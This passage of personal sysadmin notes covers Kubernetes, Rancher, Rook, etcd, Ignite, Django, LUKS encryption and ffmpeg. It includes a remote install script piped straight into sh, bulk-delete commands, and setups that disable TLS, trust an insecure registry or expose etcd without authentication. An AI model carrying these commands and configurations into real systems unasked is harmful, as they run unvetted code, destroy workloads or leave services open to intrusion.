example-app   1         1         1            1           16m
sample-app    1         1         1            1           6m
"

$ kubectl get deployments --all-namespaces
"
NAMESPACE       NAME                   DESIRED   CURRENT   UP-TO-DATE   AVAILABLE   AGE
cattle-system   cattle-cluster-agent   1         1         1            1           5d
ingress-nginx   default-http-backend   1         1         1            1           5d
kube-system     kube-dns               1         1         1            1           5d
kube-system     kube-dns-autoscaler    1         1         1            1           5d
kube-system     metrics-server         1         1         1            1           5d
sample-ns       example-app            1         1         1            1           43m
sample-ns       sample-app             1         1         1            1           31m
"

$ kubectl delete deployments --all
"
deployment.extensions "example-app" deleted
deployment.extensions "sample-app" deleted
"

$ kubectl delete services --all
"
service "example-app" deleted
service "sample-service" deleted
"

https://kubernetes.io/docs/reference/kubectl/cheatsheet/
https://kubernetes.io/docs/tasks/run-application/run-stateless-application-deployment/
https://kubernetes.io/docs/tasks/access-application-cluster/service-access-application-cluster/
https://kubernetes.io/docs/tasks/administer-cluster/namespaces-walkthrough/#understand-the-default-namespace


14.11.9 Difference between targetPort and port in kubernetes Service definition

Port: Port is the port number which makes a service visible to other services running within the same K8s cluster. In other words, in case a service wants to invoke another service running within the same Kubernetes cluster, it will be able to do so using the port specified against "port" in the service spec file. port is the port your service listens on inside the cluster.

Target Port: Target port is the port on the POD where the service is running. targetPort defaults to the same value as port if not specified otherwise.

NodePort: Node port is the port on which the service can be accessed by external users via kube-proxy. nodePort is the port that a client outside of the cluster will "see". nodePort is opened on every node in your cluster via kube-proxy. With iptables magic Kubernetes (k8s) then routes traffic from that port to a matching service pod (even if that pod is running on a completely different node). nodePort is unique, so two different services cannot have the same nodePort assigned. Once declared, the k8s master reserves that nodePort for that service. nodePort is then opened on EVERY node (master and worker), including nodes that do not run a pod of that service; k8s iptables magic takes care of the routing. That way you can make your service request from outside your k8s cluster to any node on nodePort without worrying whether a pod is scheduled there or not.

apiVersion: v1
kind: Service
metadata:
  name: test-service
spec:
  ports:
  - port: 8080
    targetPort: 8170
    nodePort: 33333
    protocol: TCP
  selector:
    component: test-service-app

The port is 8080 which represents that test-service can be accessed by other services in the cluster at port 8080. The targetPort is 8170 which represents the test-service is actually running on port 8170 on pods The nodePort is 33333 which represents that test-service can be accessed via kube-proxy on port 33333. https://stackoverflow.com/a/49982009 https://stackoverflow.com/a/41963878

14.11.10 Sample Project https://github.com/testdrivenio/flask-vue-kubernetes https://testdriven.io/blog/running-flask-on-kubernetes/ https://github.com/hnarayanan/kubernetes-django https://github.com/wildfish/kubernetes-django-starter/tree/master/k8s

14.11.11 Deploy a docker registry in the kubernetes cluster and configure Ingress with Let’s Encrypt https://github.com/kubernetes/ingress-nginx/tree/master/docs/examples/docker-registry


14.11.12 Deploy a docker registry without TLS in the kubernetes cluster

Define namespace, deployment, service and ingress in one file called docker-registry-deployment.yaml:

#
# Local docker registry without TLS
# kubectl create -f docker-registry.yaml
#
apiVersion: v1
kind: Namespace
metadata:
  name: docker-registry
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: docker-registry
  labels:
    name: docker-registry
  namespace: docker-registry
spec:
  replicas: 1
  template:
    metadata:
      labels:
        app: docker-registry
    spec:
      containers:
      - name: docker-registry
        image: registry:2
        imagePullPolicy: Always
        ports:
        - containerPort: 5000
        # @note: we enable delete image API
        env:
        - name: REGISTRY_STORAGE_DELETE_ENABLED
          value: "true"
        - name: REGISTRY_HTTP_ADDR
          value: ":5000"
        - name: REGISTRY_STORAGE_FILESYSTEM_ROOTDIRECTORY
          value: "/var/lib/registry"
        volumeMounts:
        - name: docker-registry-mount
          mountPath: "/var/lib/registry"
      volumes:
      - name: docker-registry-mount
        persistentVolumeClaim:
          claimName: docker-registry-pvc

---
kind: Service
apiVersion: v1
metadata:
  name: docker-registry
  namespace: docker-registry
spec:
  selector:
    app: docker-registry
  ports:
  - port: 5000
    targetPort: 5000

---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  annotations:
    nginx.ingress.kubernetes.io/proxy-body-size: "0"
    nginx.ingress.kubernetes.io/proxy-read-timeout: "600"
    nginx.ingress.kubernetes.io/proxy-send-timeout: "600"
  name: docker-registry
  namespace: docker-registry
spec:
  rules:
  - host: registry.me
    http:
      paths:
      - backend:
          serviceName: docker-registry
          servicePort: 5000
        path: /

---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: docker-registry-pv
  labels:
    type: local
  namespace: docker-registry
spec:
  capacity:
    storage: 20Gi
  storageClassName: standard
  accessModes:
  - ReadWriteOnce
  hostPath:
    path: "/data/docker-registry-pv"

---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: docker-registry-pvc
  labels:
    type: local
  namespace: docker-registry
spec:
  accessModes:
  - ReadWriteOnce
  resources:
    requests:
      storage: 20Gi
  volumeName: docker-registry-pv
  storageClassName: standard

Deploy on kubernetes:

$ kubectl create -f docker-registry-deployment.yaml

14.11.13 Configure docker service to use local insecure registry

Add --insecure-registry registry.me:80 to docker.service file:

$ sudo vim /lib/systemd/system/docker.service

ExecStart=/usr/bin/dockerd --max-concurrent-downloads 1 --insecure-registry registry.me:80 -H fd://

Or add to daemon.json file:

$ vim /etc/docker/daemon.json

{ "insecure-registries":["registry.me:80"] }

And then restart docker:

$ systemctl daemon-reload
$ service docker restart

Add tag same as registry.me:80 registry name to one image and push it to local registry:

$ docker tag nginx:1.10.2 registry.me:80/nginx
$ docker push registry.me:80/nginx

Now the repo is available: http://registry.me/v2/nginx/tags/list
List of images on the local docker registry: http://registry.me/v2/_catalog
Deploy a new nginx pod from the registry.me:80/nginx local registry on kubernetes:

$ kubectl run nginx --image=registry.me:80/nginx

Note: You need to update DNS for registry.me on host and nodes. https://github.com/Juniper/contrail-docker/wiki/Configure-docker-service-to-use-insecure-registry
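For a quick local test, a hosts-file entry pointing registry.me at the ingress controller's node can stand in for real DNS (the IP below is illustrative):

# /etc/hosts on the workstation and on every node
192.168.0.191   registry.me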


14.11.14 Delete images from a private local docker registry

$ curl --head -XGET -H "Accept: application/vnd.docker.distribution.manifest.v2+json" http://registry.me:80/v2/nginx/manifests/latest

HTTP/1.1 200 OK
Server: nginx/1.13.12
Date: Mon, 04 Mar 2019 08:51:01 GMT
Content-Type: application/vnd.docker.distribution.manifest.v2+json
Content-Length: 3237
Connection: keep-alive
Docker-Content-Digest: sha256:6298d62cef5e82170501d4d9f9b3d7549b8c272fae787f1b93829edd472f894a
Docker-Distribution-Api-Version: registry/2.0
Etag: "sha256:6298d62cef5e82170501d4d9f9b3d7549b8c272fae787f1b93829edd472f894a"
X-Content-Type-Options: nosniff

$ curl -X DELETE -H "Accept: application/vnd.docker.distribution.manifest.v2+json" http://registry.me:80/v2/nginx/manifests/sha256:6298d62cef5e82170501d4d9f9b3d7549b8c272fae787f1b93829edd472f894a

https://docs.docker.com/registry/spec/api/#/deleting-an-image

By default delete is disabled, and you will see this error:

{"errors":[{"code":"UNSUPPORTED","message":"The operation is unsupported."}]} to enable it you need to set REGISTRY_STORAGE_DELETE_ENABLED=true env. https://github.com/docker/distribution/issues/1573

14.11.15 Assigning Pods to Nodes

Attach label to the node:

$ kubectl get nodes
'
NAME         STATUS    ROLES               AGE       VERSION
ubuntu-190   Ready     controlplane,etcd   33d       v1.11.6
ubuntu-191   Ready     worker              34m       v1.11.6
ubuntu-192   Ready     worker              38s       v1.11.6
ubuntu-193   Ready     worker              9s        v1.11.6
'
# kubectl label nodes <node-name> <label-key>=<label-value>
$ kubectl label nodes ubuntu-191 workerType=Storage

Add a nodeSelector field to the pod configuration:

apiVersion: v1
kind: Pod
metadata:
  name: postgres
  labels:
    env: test
spec:
  containers:
  - name: postgres
    image: postgres
    imagePullPolicy: IfNotPresent
  nodeSelector:
    workerType: Storage

https://kubernetes.io/docs/concepts/configuration/assign-pod-node/

14.12 Rancher

14.12.1 Install

Docker

Rancher 2.x:

$ docker run -d --restart=unless-stopped -p 80:80 -p 443:443 rancher/rancher https://github.com/rancher/rancher#quick-start

Minimum System

To install etcd and the Control Plane on one node: RAM: 2GB, CPU: 1 core

Vagrant

$ vagrant init ubuntu/xenial64
$ vim Vagrantfile

# Set a ping-able network from the host
config.vm.network "private_network", ip: "192.168.33.10"
# Set more memory
config.vm.provider "virtualbox" do |vb|
  vb.memory = "4096"
end

# vagrant reload
$ vagrant up --provider virtualbox
$ vagrant ssh
$ apt-get update
$ apt-get upgrade
$ curl https://releases.rancher.com/install-docker/1.12.sh | sh
$ sudo usermod -aG docker ubuntu

Now go to: http://192.168.10.119:1010/env/1a5/infra/hosts/add?driver=custom https://www.vagrantup.com/docs/virtualbox/configuration.html


14.12.2 Setting Up a Rancher http://docs.rancher.com/rancher/v1.5/en/quick-start-guide/ https://github.com/infracloudio/rancher-vagrant-setup

14.12.3 Resiliency Planes

For production deployments, it is best practice that each plane runs on dedicated physical or virtual hosts. For development, multi-tenancy may be used to simplify management and reduce costs.

Data Plane: This plane is comprised of one or more etcd containers. Etcd is a distributed reliable key-value store which stores all Kubernetes state. This plane may be referred to as stateful, meaning the software comprising the plane maintains application state.

Orchestration Plane: This plane is comprised of stateless components that power our Kubernetes distribution.

Compute Plane: This plane is comprised of the Kubernetes pods.

http://docs.rancher.com/rancher/v1.5/en/kubernetes/resiliency-planes/
http://docs.rancher.com/rancher/v1.5/en/kubernetes/resiliency-planes/#separated-planes
http://docs.rancher.com/rancher/v1.5/en/kubernetes/resiliency-planes/#overlapping-planes

Host Requirements for Kubernetes

For an overlapping planes setup: at least 1 CPU, 2 GB RAM. Resource requirements vary depending on workload.

For a separated planes setup, a minimum of five hosts is required for this deployment type:

Data Plane: Add 3 or more hosts with 1 CPU, >=1.5 GB RAM, >=20 GB DISK. When adding the host, label these hosts with etcd=true.

Orchestration Plane: Add 1 or more hosts with >=1 CPU and >=2 GB RAM. When adding the host, label these hosts with orchestration=true. You can get away with 1 host, but you sacrifice high availability. In the event of this host failing, some K8s features such as the API, rescheduling pods in the event of failure, etc. will not occur until a new host is provisioned.

Compute Plane: Add 1 or more hosts. When adding the host, label these hosts with compute=true.

http://docs.rancher.com/rancher/v1.5/en/kubernetes/#host-requirements-for-kubernetes

My result:
with etcd=true: 222 MB RAM
with orchestration=true: 400 MB RAM
with compute=true: 400 MB RAM


14.12.4 Backup Rancher server data

$ docker stop <rancher_server_container_id>
$ docker create --volumes-from <rancher_server_container_id> --name rancher-data rancher/server
$ docker export rancher-data > rancher-data.tar
$ docker run -d --volumes-from rancher-data --restart=unless-stopped -p 80:8080 rancher/server

$ docker cp <rancher_server_container_id>:/var/lib/mysql <backup_path_on_host>

https://docs.rancher.com/rancher/v1.5/en/upgrading/#single-container

14.12.5 Links

http://rancher.com/kubernetes/
http://rancher.com/comparing-rancher-orchestration-engine-options/
https://orchestration.io/2016/06/30/deploying-kubernetes-with-rancher/
http://blog.kubernetes.io/2016/07/kubernetes-in-rancher-further-evolution.html
http://rancher.com/cattle-swarm-kubernetes-side-side/
http://docs.rancher.com/rancher/v1.5/en/installing-rancher/installing-server/#single-container
http://docs.rancher.com/rancher/v1.5/en/hosts/#supported-docker-versions
https://github.com/rancher/rancher/wiki/Kubernetes-Management
https://kubernetes.io/docs/user-guide/walkthrough/
http://cdn2.hubspot.net/hubfs/468859/Comparing%20Rancher%20Orchestration%20Engine%20Options.pdf
https://cdn2.hubspot.net/hubfs/468859/Deploying%20and%20Scaling%20Kubernetes%20with%20Rancher%20-%202nd%20ed.pdf

14.13 Rook

14.13.1 Deploy CephFS on kubernetes with rook

$ mkdir rook
$ cd rook
$ wget https://raw.githubusercontent.com/rook/rook/master/cluster/examples/kubernetes/ceph/operator.yaml
$ wget https://raw.githubusercontent.com/rook/rook/master/cluster/examples/kubernetes/ceph/cluster.yaml

To disable TLS, edit the cluster.yaml file:

dashboard:
  enabled: true
  # serve the dashboard under a subpath (useful when you are accessing the dashboard via a reverse proxy)
  # urlPrefix: /ceph-dashboard
  # serve the dashboard at the given port.
  # port: 8443
  # serve the dashboard using SSL
  ssl: false

Ingress file, ingress.yaml:

apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: rook-ceph-mgr-dashboard
  namespace: rook-ceph
  annotations:
    kubernetes.io/ingress.class: "nginx"
spec:
  rules:
  - host: rook-ceph.example.com
    http:
      paths:
      - path: /
        backend:
          serviceName: rook-ceph-mgr-dashboard
          servicePort: 8443

$ kubectl create -f operator.yaml
$ kubectl create -f cluster.yaml
$ kubectl create -f ingress.yaml

$ kubectl -n rook-ceph get pod
'
NAME                                     READY   STATUS      RESTARTS   AGE
rook-ceph-mgr-a-ffc44857d-xgh4d          1/1     Running     0          50m
rook-ceph-mon-a-86f5fc4bc-clmfb          1/1     Running     0          51m
rook-ceph-mon-b-7955f84c5c-sqhvj         1/1     Running     0          51m
rook-ceph-mon-c-684556d465-sfmvv         1/1     Running     0          51m
rook-ceph-osd-0-65968b6d86-wkdxt         1/1     Running     0          50m
rook-ceph-osd-prepare-ubuntu-191-h6g2x   0/2     Completed   0          50m
'

$ kubectl -n rook-ceph get service
'
NAME                      TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)    AGE
rook-ceph-mgr             ClusterIP   10.43.148.58    <none>        9283/TCP   50m
rook-ceph-mgr-dashboard   ClusterIP   10.43.89.64     <none>        8443/TCP   50m
rook-ceph-mon-a           ClusterIP   10.43.117.36    <none>        6789/TCP   51m
rook-ceph-mon-b           ClusterIP   10.43.164.245   <none>        6789/TCP   51m
rook-ceph-mon-c           ClusterIP   10.43.205.134   <none>        6789/TCP   51m
'

$ kubectl -n rook-ceph-system get pod
'
NAME                                  READY   STATUS    RESTARTS   AGE
rook-ceph-agent-w6lsz                 1/1     Running   0          1h
rook-ceph-operator-5496d44d7c-wnm7h   1/1     Running   0          1h
rook-discover-b4v7g
'

$ kubectl -n rook-ceph get ingress
'
NAME                      HOSTS                   ADDRESS         PORTS   AGE
rook-ceph-mgr-dashboard   rook-ceph.example.com   192.168.0.191   80      13m
'

Now browse: http://rook-ceph.example.com/#/dashboard

The username is admin and the password is:

$ kubectl -n rook-ceph get secret rook-ceph-dashboard-password -o jsonpath="{['data']['password']}" | base64 --decode && echo

https://github.com/rook/rook/issues/2433

14.14 Etcd

In order to expose the etcd API to clients outside of the Docker host, you'll need to use the host IP address when configuring etcd.

$ export HostIP="192.168.1.40"

$ docker pull gcr.io/etcd-development/etcd:v3.3.4
$ rm -rf /tmp/etcd-data.tmp && mkdir -p /tmp/etcd-data.tmp && \
  docker rmi gcr.io/etcd-development/etcd:v3.3.4 || true && \
  docker run \
  -p 2379:2379 \
  -p 2380:2380 \
  --mount type=bind,source=/tmp/etcd-data.tmp,destination=/etcd-data \
  --name etcd-gcr-v3.3.4 \
  gcr.io/etcd-development/etcd:v3.3.4 \
  /usr/local/bin/etcd \
  --name s1 \
  --data-dir /etcd-data \
  --listen-client-urls http://0.0.0.0:2379 \
  --advertise-client-urls http://0.0.0.0:2379 \
  --listen-peer-urls http://0.0.0.0:2380 \
  --initial-advertise-peer-urls http://0.0.0.0:2380 \
  --initial-cluster s1=http://0.0.0.0:2380 \
  --initial-cluster-token tkn \
  --initial-cluster-state new

$ docker exec etcd-gcr-v3.3.4 /bin/sh -c "/usr/local/bin/etcd --version"
$ docker exec etcd-gcr-v3.3.4 /bin/sh -c "ETCDCTL_API=3 /usr/local/bin/etcdctl version"
$ docker exec etcd-gcr-v3.3.4 /bin/sh -c "ETCDCTL_API=3 /usr/local/bin/etcdctl endpoint health"
$ docker exec etcd-gcr-v3.3.4 /bin/sh -c "ETCDCTL_API=3 /usr/local/bin/etcdctl put foo bar"
$ docker exec etcd-gcr-v3.3.4 /bin/sh -c "ETCDCTL_API=3 /usr/local/bin/etcdctl get foo"

https://github.com/coreos/etcd/releases
https://coreos.com/etcd/docs/latest/v2/docker_guide.html


14.15 Patroni

$ pip install patroni

$ git clone https://github.com/zalando/patroni $ cd patroni $ pip install -r requirements.txt

$ patronictl show-config
$ patronictl edit-config

pg_ctl, postgres, pg_basebackup and pg_rewind must be accessible within $PATH, or you should put bin_dir into the postgresql section:

postgresql:
  bin_dir: /usr/lib/postgresql/9.6
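To check a running node you can hit Patroni's REST API (port 8008 by default) or use patronictl with a configuration file; postgres0.yml here is just the sample file name from the Patroni repository and may differ in your setup:

$ curl http://127.0.0.1:8008/patroni
$ patronictl -c postgres0.yml list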

14.16 Ignite

14.16.1 Run ignite as docker

$ docker pull apacheignite/ignite
$ docker run -it --net=host -e "CONFIG_URI=https://raw.githubusercontent.com/apache/ignite/master/examples/config/example-cache.xml" apacheignite/ignite

$ pip install pylibmc

14.16.2 Connect to ignite as memcache with python

import pylibmc

client = pylibmc.Client(["127.0.0.1:11211"], binary=True)
client.set("key", 2 ** 60)
client.set("key", b'You need to send message as binary')
print("Value for 'key': %s" % client.get("key"))

There is an error when trying to set a string value for a key instead of binary:

client.set("key", 'string message')

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
_pylibmc.ConnectionError: error 3 from memcached_set: (0x21104c0) CONNECTION FAILURE, ::rec() returned zero, server has disconnected, host: 127.0.0.1:11211 -> libmemcached/io.cc:484

https://apacheignite.readme.io/docs/memcached-support#section-python

14.16.3 Enable HTTP rest API


$ docker run --name ignite --net=host -e "CONFIG_URI=https://raw.githubusercontent.com/apache/ignite/master/examples/config/example-cache.xml" apacheignite/ignite

https://apacheignite.readme.io/docs/docker-deployment

To enable HTTP connectivity, make sure that the ignite-rest-http module is in the classpath of your application. With the Ignite binary distribution, this means copying the ignite-rest-http module from the IGNITE_HOME/libs/optional folder to the IGNITE_HOME/libs folder.

https://apacheignite.readme.io/docs/rest-api#section-getting-started

$ docker exec -it ignite bash
bash-4.4# cp -r apache-ignite-fabric/libs/optional/ignite-rest-http/ apache-ignite-fabric/libs/

$ docker stop ignite
$ docker start ignite

$ curl http://localhost:8080/ignite?cmd=version
$ curl "http://localhost:8080/ignite?cmd=getorcreate&cacheName=default"
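The same REST API can be driven from Python with the requests package; a rough sketch, assuming the ignite-rest-http module is enabled as above and the default cache has been created:

import requests

base = 'http://localhost:8080/ignite'
# print the node version
print(requests.get(base, params={'cmd': 'version'}).json())
# put and get a value in the "default" cache
requests.get(base, params={'cmd': 'put', 'cacheName': 'default', 'key': 'k1', 'val': 'v1'})
print(requests.get(base, params={'cmd': 'get', 'cacheName': 'default', 'key': 'k1'}).json())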

14.16.4 Ignite Configuration

Persistence

https://ignite.apache.org/arch/persistence.html
https://apacheignite.readme.io/docs/distributed-persistent-store

Memory

https://apacheignite.readme.io/docs/memory-configuration
https://apacheignite.readme.io/docs/cache-modes
http://apache-ignite-users.70518.x6.nabble.com/Best-practise-for-setting-Ignite-Active-to-true-when-using-persistence-layer-in-Ignite-2-1-td15839.html

Evictions

https://apacheignite.readme.io/docs/evictions

Cluster is inactive

$ ./apache-ignite-fabric/bin/control.sh --activate

"""
[12:57:49,510][SEVERE][rest-#54][GridCacheCommandHandler] Failed to execute cache command: GridRestCacheRequest [cacheName=default, cacheFlags=0, ttl=null, super=GridRestRequest [destId=null, clientId=null, addr=/127.0.0.1:44546, cmd=GET_OR_CREATE_CACHE]]
class org.apache.ignite.IgniteException: Can not perform the operation because the cluster is inactive. Note, that the cluster is considered inactive by default if Ignite Persistent Store is used to let all the nodes join the cluster. To activate the cluster call Ignite.active(true).
"""


14.16.5 Sample Ignite configuration file

127.0.0.1:47500..47509
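A minimal sketch of such a configuration, using the discovery address range above; the bean structure follows the standard Ignite examples and is an assumption here:

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
                           http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean class="org.apache.ignite.configuration.IgniteConfiguration">
        <property name="discoverySpi">
            <bean class="org.apache.ignite.spi.discovery.tcp.TcpDiscoverySpi">
                <property name="ipFinder">
                    <bean class="org.apache.ignite.spi.discovery.tcp.ipfinder.vm.TcpDiscoveryVmIpFinder">
                        <property name="addresses">
                            <list>
                                <!-- local node discovery port range -->
                                <value>127.0.0.1:47500..47509</value>
                            </list>
                        </property>
                    </bean>
                </property>
            </bean>
        </property>
    </bean>
</beans>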


14.17 Function as a service (FaaS)

14.17.1 faas https://github.com/openfaas/faas

14.17.2 kubeless https://github.com/kubeless/kubeless

14.17.3 fission https://github.com/fission/fission


CHAPTER 15

Dictionary

Contents:

15.1 Words

warehouse sluggish audit coarse datum ideal span equality analogous misnomer Empirical resembles cowardly incognito penalty negligible exhausts Horrible

inventory qty probability belt disaster concern flavors sophistical compel deployment expedite versatile facilitates Replication inadvertently Convenient overwhelmingly allotted incredibly merely neutral observer arbiter empirical lapse heartbeat excerpt rely rationale exceptional Concluding dedicate rough spots unproductive colleagues’ lapses

shrine beaten differ fragments Jelly bean Key Lime Pie Gingerbread struck through chop rice chopsticks literally dislocated fists of fury feint talent drip hire reassuring despite defacement bartending tension sculpt bust dork fury stunt beat ingredients crew attitude palindrome jab prone cartridge

revise spotted loyalty opening ceremony Defense burst tamil immigrant cheater

15.2 Terminology

redundancy
durability
Consistency
vertical scaling or scaling up
horizontally, or scaling out (MongoDB scales horizontally by partitioning data in a process known as sharding.)
accumulating
granular
fault tolerance
compound indexes (As a general rule, a query where one term demands an exact match and another specifies a range requires a compound index where the range key comes second.)
pages (4 KB chunks called pages)
In MongoDB's B-tree implementation, a new node is allocated 8,192 bytes (8 KB)
The maximum key size in MongoDB v2.0 is 1024 bytes
page fault
thrashing
ubiquitous btree (http://www.cl.cam.ac.uk/~smh22/docs/ubiquitous_btree.pdf)
sparse != dense
covering indexes = index-only queries
concern
high cardinality
Replication
network latency
arbiter
ACID (Atomicity, Consistency, Isolation, Durability)


15.3 Abbreviation

EAP Early Access Program


CHAPTER 16

Django

Contents:

16.1 Tips

16.1.1 Create new project

django-admin startproject mysite
python manage.py startapp polls

16.1.2 Using django in python cmd

import django
from django.conf import settings

django.setup()  # or settings.configure()

16.1.3 Migration

$ python manage.py makemigrations
$ python manage.py migrate
$ python manage.py syncdb

16.1.4 Django dump data of django.contrib.auth.Group

Note: deprecated from Django 1.7 !

$ python manage.py dumpdata --format=json auth.Group > fixtures.json


16.1.5 Django migration for auth

$ python manage.py makemigrations account
$ python manage.py makemigrations --empty account

Now add your code to load the initial data in the RunPython section:

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


def forwards_func(apps, schema_editor):
    Group = apps.get_model("auth", "Group")
    db_alias = schema_editor.connection.alias
    Group.objects.using(db_alias).bulk_create([
        Group(name='Viewer'),
        Group(name='Editor'),
        Group(name='Admin'),
    ])


class Migration(migrations.Migration):

    dependencies = [
        ('account', '0001_initial'),
    ]

    operations = [
        migrations.RunPython(
            forwards_func,
        ),
    ]

Then:

$ python manage.py syncdb

The '__first__' and '__latest__' values can be used in the dependencies section.

https://code.djangoproject.com/ticket/23422
https://docs.djangoproject.com/en/1.7/topics/migrations/#dependencies
https://docs.djangoproject.com/en/1.7/ref/migration-operations/
https://docs.djangoproject.com/en/dev/ref/django-admin/#loaddata-fixture-fixture
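For instance, a hypothetical migration that must run after the first migration of the auth app could declare:

class Migration(migrations.Migration):

    dependencies = [
        # run after the first migration of django.contrib.auth
        ('auth', '__first__'),
    ]

    operations = []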

16.1.6 how to reset django admin password?

$ manage.py changepassword <username>

16.1.7 Run server from Python script


#!/usr/bin/env python
import os

from django.core.management import call_command
from django.core.wsgi import get_wsgi_application

os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
application = get_wsgi_application()
call_command('runserver', '127.0.0.1:8000')

16.1.8 Static files handling

$ vim settings.py

# static files configs
STATIC_ROOT = os.path.join(BASE_DIR, 'collected_static')
STATIC_URL = '/st/'
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
)
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)

INSTALLED_APPS = (
    'django.contrib.staticfiles',
)

16.1.9 Get the static files URL in view

from django.contrib.staticfiles.templatetags.staticfiles import static

url = static('x.jpg')
# url now contains '/static/x.jpg', assuming a static path of '/static/'

https://docs.djangoproject.com/en/1.8/howto/static-files/
https://docs.djangoproject.com/en/1.8/ref/contrib/staticfiles/
http://stackoverflow.com/questions/11721818/django-get-the-static-files-url-in-view

16.1.10 Testing email sending

from django.core import mail

settings.EMAIL_USE_TLS = False
settings.EMAIL_PORT = 25
settings.EMAIL_HOST = 'mail.example.com'
settings.EMAIL_HOST_USER = '[email protected]'
settings.EMAIL_HOST_PASSWORD = ''
mail.send_mail('Subject', 'Body', '[email protected]', ['[email protected]'], fail_silently=False)


16.1.11 Django rest

Documenting your API http://www.django-rest-framework.org/topics/documenting-your-api/ https://github.com/ekonstantinidis/django-rest-framework-docs https://github.com/marcgibbons/django-rest-swagger

16.1.12 Django supported versions https://www.djangoproject.com/download/#supported-versions

16.1.13 Translation

$ django-admin makemessages -a
$ django-admin compilemessages

from django.utils.translation import ugettext
from django.utils import translation

translation.activate('fa')
txt = 'Hello'
ugettext(txt)
''

16.1.14 Django User Group Object Permissions

Add permission to user

from django.contrib.auth.models import User
from django.contrib.auth.models import Permission

usr = User.objects.first()
perm = Permission.objects.get(name='Can edit org')
usr.user_permissions.add(perm)

Add user to group

from django.contrib.auth.models import User
from django.contrib.auth.models import Group

usr = User.objects.first()
grp = Group.objects.get(name='Operator')
grp.user_set.add(usr)

Add group to user

from django.contrib.auth.models import User
from django.contrib.auth.models import Group

usr = User.objects.first()
grp = Group.objects.get(name='Operator')
usr.groups.add(grp)

Add permission to group


from django.contrib.auth.models import Group
from django.contrib.auth.models import Permission

perm = Permission.objects.get(name='can edit org')
grp = Group.objects.get(name='Operator')
grp.permissions.add(perm)

Create permission for an object

from django.contrib.auth.models import Group
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from sample.models import SampleObj

ct = ContentType.objects.get_for_model(SampleObj)
perm = Permission.objects.create(codename='can edit org', name='Can Edit Org', content_type=ct)

Add a permission to a user/group during a django migration

from django.contrib.auth.management import create_permissions
from django.db import migrations


def create_default_groups_and_permissions(apps, schema_editor):
    for app_config in apps.get_app_configs():
        app_config.models_module = True
        create_permissions(app_config, verbosity=0)
        app_config.models_module = None
    # Now add your perms to group here


class Migration(migrations.Migration):

    dependencies = [
        ('contenttypes', '0002_remove_content_type_name'),
    ]

    operations = [
        migrations.RunPython(create_default_groups_and_permissions)
    ]

Django rest DjangoModelPermissions

• GET requests require the user to have the view permission on the model.
• POST requests require the user to have the add permission on the model.
• PUT and PATCH requests require the user to have the change permission on the model.
• DELETE requests require the user to have the delete permission on the model.

https://www.django-rest-framework.org/api-guide/permissions/#djangomodelpermissions
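A minimal sketch of wiring it into a DRF view; Org and OrgSerializer are hypothetical names used only for illustration:

from rest_framework import viewsets
from rest_framework.permissions import DjangoModelPermissions

from myapp.models import Org                 # hypothetical model
from myapp.serializers import OrgSerializer  # hypothetical serializer


class OrgViewSet(viewsets.ModelViewSet):
    # maps GET/POST/PUT/PATCH/DELETE to the model's view/add/change/delete permissions
    queryset = Org.objects.all()
    serializer_class = OrgSerializer
    permission_classes = [DjangoModelPermissions]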

16.2 Modules

16.2.1 Model Fields

https://github.com/gintas/django-picklefield

https://github.com/bradjasper/django-jsonfield

CHAPTER 17

Encryption

Contents:

17.1 Crypt setup

Setup cryptographic volumes for dm-crypt (including LUKS extension)

17.2 Encrypt home directory with cryptsetup module

1. Backup home directory
2. Install modules:

$ apt-get install cryptsetup

3. Install header files (if you got warn about headers files in previous step)

$ apt-get install firmware-linux firmware-realtek intel-microcode

4. Unmount partitions

$ umount -a

5. Load modules in kernel

$ modprobe xts
$ modprobe dm-crypt
$ modprobe aes
$ modprobe aes-in
$ modprobe aesni-intel
$ modprobe aes-x86_64


6. Encrypt wanted partition

$ cryptsetup luksFormat -h --debug --cipher aes-xts-plain64 --hash sha256 /dev/sda5

Another option for the cipher is aes-cbc-essiv:sha512.

7. Restart so the new UUID takes effect
8. Open encrypted partition

$ cryptsetup luksOpen /dev/sda5 home

9. Format partition with wanted partition type

$ mkfs.<fs_type> /dev/mapper/home   # e.g. mkfs.ext4

10. Adding this partition to fstab file, also comment old line for home partition

$ vim /etc/fstab

/dev/mapper/home /home ext4 defaults 0 2

11. Get UUID of encryption partition

$ blkid

12. Adding UUID of encryption partition to etc/crypttab file

$ vim /etc/crypttab

home UUID=<UUID> none luks

13. Mount encryption partition

$ mount /dev/mapper/home

14. Copy home directory from backup to this encryption partition

$ mkdir /home/or $ cp -R /backup/or /home $ chown -R or /home/or

15. Update image file of boot

$ update-initramfs -u

16. Check status of encrypted partition

$ cryptsetup luksDump /dev/sda5

17. Backup headers of encryption partition

$ cryptsetup luksHeaderBackup /dev/sda5 --header-backup-file /backup/sha5_ency_header.img

Resources: Encrypt your linux home folder 2 ways and 10 steps


17.3 TrueCrypt

https://www.grc.com/misc/truecrypt/truecrypt.htm


CHAPTER 18

ffmpeg

Contents:

18.1 tips

18.1.1 Cmds

$ ffmpeg -formats   # print the list of supported file formats
$ ffmpeg -codecs    # print the list of supported codecs (E=encode, D=decode)

$ ffmpeg --help

-i          set the input file. Multiple -i switches can be used
-f          set video format (for the input if before -i, for the output otherwise)
-an         ignore audio
-vn         ignore video
-ar         set audio rate (in Hz)
-ac         set the number of channels
-ab         set audio bitrate
-acodec     choose audio codec or use "copy" to bypass audio encoding
-vcodec     choose video codec or use "copy" to bypass video encoding
-r          video fps. You can also use fractional values like 30000/1001 instead of 29.97
-s          frame size (w x h, ie: 320x240)
-aspect     set the aspect ratio i.e: 4:3 or 16:9
-sameq      ffmpeg tries to keep the visual quality of the input
